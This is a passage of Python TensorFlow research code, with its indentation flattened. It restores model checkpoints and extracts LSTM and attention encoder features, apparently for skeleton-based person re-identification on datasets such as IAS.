# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# X_pred.append(att_op)
# else:
# X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# # if Bi_LSTM:
# # f_o_bw = encoder_outputs_bw[index, :, :]
# # f_o = f_o + f_o_bw
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# X_pred.append(f_o)
# else:
# X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
y.extend([k] * batch_size)
# C_y.extend([k] * batch_size)
else:
y.extend([k] * batch_size * time_steps)
# exit(1)
for k, v in t_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X.append(att_op)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_X.append(c_vec)
else:
t_X.extend(att_op.tolist())
t_X_att.append(weights)
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_X.append(f_o)
else:
t_X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
t_X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X_pred.append(att_op)
# else:
# t_X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# t_X_pred.append(f_o)
# else:
# t_X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# t_X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_y.extend([k] * (batch_size - flag))
# t_C_y.extend([k] * (batch_size - flag))
else:
t_y.extend([k] * (batch_size - flag) * time_steps)
if dataset == 'IAS':
for k, v in t_2_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_2_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_2_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_2_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_2_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_2_X.append(c_vec)
else:
t_2_X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_2_X.append(f_o)
else:
t_2_X.extend(f_o.tolist())
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_2_X.extend(c_vec)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_2_y.extend([k] * (batch_size - flag))
# t_2_C_y.extend([k] * (batch_size - flag))
else:
t_2_y.extend([k] * (batch_size - flag) * time_steps)
X_1 = np.array(X)
y_1 = np.array(y)
X_pred_1 = np.array(X_pred)
t_X_pred_1 = np.array(t_X_pred)
ids_keys = sorted(list(ids.keys()))
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in ids_keys]
t_classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=t_classes)
if dataset == 'IAS':
t_2_ids_keys = sorted(list(t_2_ids.keys()))
t_2_classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=t_2_classes)
t_2_y_1 = t_2_y
t_2_X_1 = t_2_X
t_y = np.array(t_y)
if C_reid == '1':
t_C_X = np.array(t_C_X)
else:
t_X = np.array(t_X)
t_y_1 = t_y
t_X_1 = t_X
# checkpoint 2
_targets = copy.deepcopy(_input_data)
for i in range(_input_data.shape[0]):
permutation_ = np.random.permutation(time_steps)
_input_data[i] = _input_data[i, permutation_]
loaded_graph = tf.Graph()
with tf.Session(graph=loaded_graph, config=config) as sess:
loader = tf.train.import_meta_graph(checkpoint_2 + '.meta')
loader.restore(sess, checkpoint)
input_data = loaded_graph.get_tensor_by_name('inputs:0')
targets = loaded_graph.get_tensor_by_name('targets:0')
if Frozen == '1':
contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
else:
contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
if Bi_LSTM:
encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
else:
encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
predictions = loaded_graph.get_tensor_by_name('predictions:0')
# train_output = loaded_graph.get_tensor_by_name('train_output:0')
if use_attention:
alignment_history = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
# train_attention_matrix = loaded_graph.get_tensor_by_name('train_attention_matrix:0')
attention_state = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_12:0')
attention_weights = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_8:0')
alignment = loaded_graph.get_tensor_by_name('decode/decoder/while/Exit_10:0')
lr = loaded_graph.get_tensor_by_name('learning_rate:0')
keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')
source_sequence_length = loaded_graph.get_tensor_by_name('source_sequence_length:0')
target_sequence_length = loaded_graph.get_tensor_by_name('target_sequence_length:0')
X = []
C_X = []
X_all_op = []
X_final_op = []
X_final_c = []
X_final_h = []
X_final_c1 = []
X_final_h1 = []
X_final_ch = []
X_final_ch1 = []
y = []
C_y = []
X_pred = []
t_X = []
t_C_X = []
t_y = []
t_C_y = []
t_2_X = []
t_2_C_X = []
t_2_y = []
t_2_C_y = []
t_X_pred = []
t_X_att = []
# print(t_ids)
# print(test_attention)
ids_ = sorted(ids.items(), key=lambda item:item[0])
t_ids_ = sorted(t_ids.items(), key=lambda item: item[0])
if dataset == 'IAS':
t_2_ids_ = sorted(t_2_ids.items(), key=lambda item: item[0])
# print(ids_)
# exit(1)
for k, v in ids_:
if len(v) == 0:
print(k)
continue
if len(v) < batch_size:
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = _input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = _targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'c':
X.append(t2)
elif type == 'ch':
t3.extend(t2)
X.append(t3)
elif type == 'o':
X.append(t1)
elif type == 'oc':
t1.extend(t2)
X.append(t1)
elif type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
X.append(att_op)
else:
att_batch.append(att_op)
# else:
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# X.append(c_vec)
else:
X.extend(att_op.tolist())
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# # if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# att_batch.append(att_op)
# att_batch = np.array(att_batch)
# _, c_loss, c_vec = sess.run([C_train_op, C_loss, contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o + f_o_bw
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
X.append(f_o)
else:
X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'c':
# X_pred.append(t2)
# elif type == 'ch':
# t3.extend(t2)
# X_pred.append(t3)
# elif type == 'o':
# X_pred.append(t1)
# elif type == 'oc':
# t1.extend(t2)
# X_pred.append(t1)
# elif type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# X_pred.append(att_op)
# else:
# X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# # if Bi_LSTM:
# # f_o_bw = encoder_outputs_bw[index, :, :]
# # f_o = f_o + f_o_bw
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# X_pred.append(f_o)
# else:
# X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
y.extend([k] * batch_size)
# C_y.extend([k] * batch_size)
else:
y.extend([k] * batch_size * time_steps)
# exit(1)
for k, v in t_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run([encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history, attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X.append(att_op)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_X.append(c_vec)
else:
t_X.extend(att_op.tolist())
t_X_att.append(weights)
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_X.append(f_o)
else:
t_X.extend(f_o.tolist())
elif type == 'attc':
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
att_op = np.reshape(att_op, [-1]).tolist()
att_op.extend(t2)
t_X.append(att_op)
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_X.extend(c_vec)
pred = pred.tolist()
for index, i in enumerate(pred):
pred[index].reverse()
pred = np.array(pred)
# en_outputs, en_c, en_h, en_c_1, en_h_1, pred_2 = sess.run(
# [encoder_output, encoder_c, encoder_h, encoder_c_1, encoder_h_1, predictions],
# {input_data: pred,
# targets: this_targets,
# lr: learning_rate,
# target_sequence_length: [time_steps] * batch_size,
# source_sequence_length: [time_steps] * batch_size,
# keep_prob: 0.5})
# for index in range(en_outputs.shape[0]):
# t1 = np.reshape(en_outputs[index], [-1]).tolist()
# t2 = np.reshape(en_c[index], [-1]).tolist()
# t3 = np.reshape(en_h[index], [-1]).tolist()
# t4 = np.reshape(en_c_1[index], [-1]).tolist()
# t5 = np.reshape(en_h_1[index], [-1]).tolist()
# if type == 'att':
# if use_attention and AGEs:
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# if manner == 'sc':
# att_op = np.reshape(att_op, [-1]).tolist()
# t_X_pred.append(att_op)
# else:
# t_X_pred.extend(att_op.tolist())
# else:
# f_o = en_outputs[index, :, :]
# if manner == 'sc':
# f_o = np.reshape(f_o, [-1]).tolist()
# t_X_pred.append(f_o)
# else:
# t_X_pred.extend(f_o.tolist())
# elif type == 'attc':
# weights = att_history[:, index, :]
# f_o = en_outputs[index, :, :]
# att_op = np.matmul(weights, f_o)
# att_op = np.reshape(att_op, [-1]).tolist()
# att_op.extend(t2)
# t_X_pred.append(att_op)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_y.extend([k] * (batch_size - flag))
# t_C_y.extend([k] * (batch_size - flag))
else:
t_y.extend([k] * (batch_size - flag) * time_steps)
if dataset == 'IAS':
for k, v in t_2_ids_:
flag = 0
if len(v) == 0:
continue
if len(v) < batch_size:
flag = batch_size - len(v)
v.extend([v[0]] * (batch_size - len(v)))
# print('%s - %d' % (k, len(v)))
for batch_i in range(len(v) // batch_size):
this_input = t_2_input_data[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
this_targets = t_2_targets[v[batch_i * batch_size : (batch_i + 1) * batch_size]]
if use_attention:
if Frozen == '1':
en_outputs, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, c_vec, en_c, en_h, en_c_1, en_h_1, pred, att_state, att_history, att, align = sess.run(
[encoder_output, contrast_v, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions, attention_state, alignment_history,
attention_weights, alignment],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
C_lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if C_reid == '1':
t_2_C_X.extend(c_vec)
else:
if Bi_LSTM:
en_outputs, encoder_outputs_bw, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_output_bw, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
else:
en_outputs, en_c, en_h, en_c_1, en_h_1, pred = sess.run(
[encoder_output, encoder_c,
encoder_h, encoder_c_1, encoder_h_1, predictions],
{input_data: this_input,
targets: this_targets,
lr: learning_rate,
target_sequence_length: [time_steps] * batch_size,
source_sequence_length: [time_steps] * batch_size,
keep_prob: 1.0})
if flag > 0:
en_outputs = en_outputs[:-flag]
att_batch = []
for index in range(en_outputs.shape[0]):
t1 = np.reshape(en_outputs[index], [-1]).tolist()
t2 = np.reshape(en_c[index], [-1]).tolist()
t3 = np.reshape(en_h[index], [-1]).tolist()
t4 = np.reshape(en_c_1[index], [-1]).tolist()
t5 = np.reshape(en_h_1[index], [-1]).tolist()
if type == 'att':
if use_attention and AGEs:
weights = att_history[:, index, :]
f_o = en_outputs[index, :, :]
att_op = np.matmul(weights, f_o)
if manner == 'sc' or Frozen == '1':
att_op = np.reshape(att_op, [-1]).tolist()
if manner == 'sc':
t_2_X.append(att_op)
else:
att_batch.append(att_op)
# att_batch = np.array(att_batch)
# c_vec = sess.run([contrast_v],
# {C_input: att_batch,
# lr: learning_rate
# })
# t_2_X.append(c_vec)
else:
t_2_X.extend(att_op.tolist())
else:
f_o = en_outputs[index, :, :]
if Bi_LSTM:
f_o_bw = encoder_outputs_bw[index, :, :]
f_o = f_o_bw + f_o
if manner == 'sc':
f_o = np.reshape(f_o, [-1]).tolist()
t_2_X.append(f_o)
else:
t_2_X.extend(f_o.tolist())
if Frozen == '1':
att_batch = np.array(att_batch)
[c_vec] = sess.run([contrast_v],
{C_input: att_batch,
lr: learning_rate
})
t_2_X.extend(c_vec)
if manner == 'sc' or Frozen == '1' or C_reid == '1':
t_2_y.extend([k] * (batch_size - flag))
# t_2_C_y.extend([k] * (batch_size - flag))
else:
t_2_y.extend([k] * (batch_size - flag) * time_steps)
X_2 = np.array(X)
y_2 = np.array(y)
X_pred_2 = np.array(X_pred)
t_X_pred_2 = np.array(t_X_pred)
ids_keys = sorted(list(ids.keys()))
t_ids_keys = sorted(list(t_ids.keys()))
classes = [i for i in ids_keys]
t_classes = [i for i in t_ids_keys]
t_y = label_binarize(t_y, classes=t_classes)
if dataset == 'IAS':
t_2_ids_keys = sorted(list(t_2_ids.keys()))
t_2_classes = [i for i in t_2_ids_keys]
t_2_y = label_binarize(t_2_y, classes=t_2_classes)
t_2_y_2 = t_2_y
t_2_X_2 = t_2_X
t_y = np.array(t_y)
if C_reid == '1':
t_C_X = np.array(t_C_X)
else:
t_X = np.array(t_X)
t_y_2 = t_y
t_X_2 = t_X
# preds = np.array(preds)
# preditions = np.array(preditions)
global permutation, permutation_flag, permutation_test_flag, permutation_test_2_flag, test_permutation, test_2_permutation
if not permutation_flag:
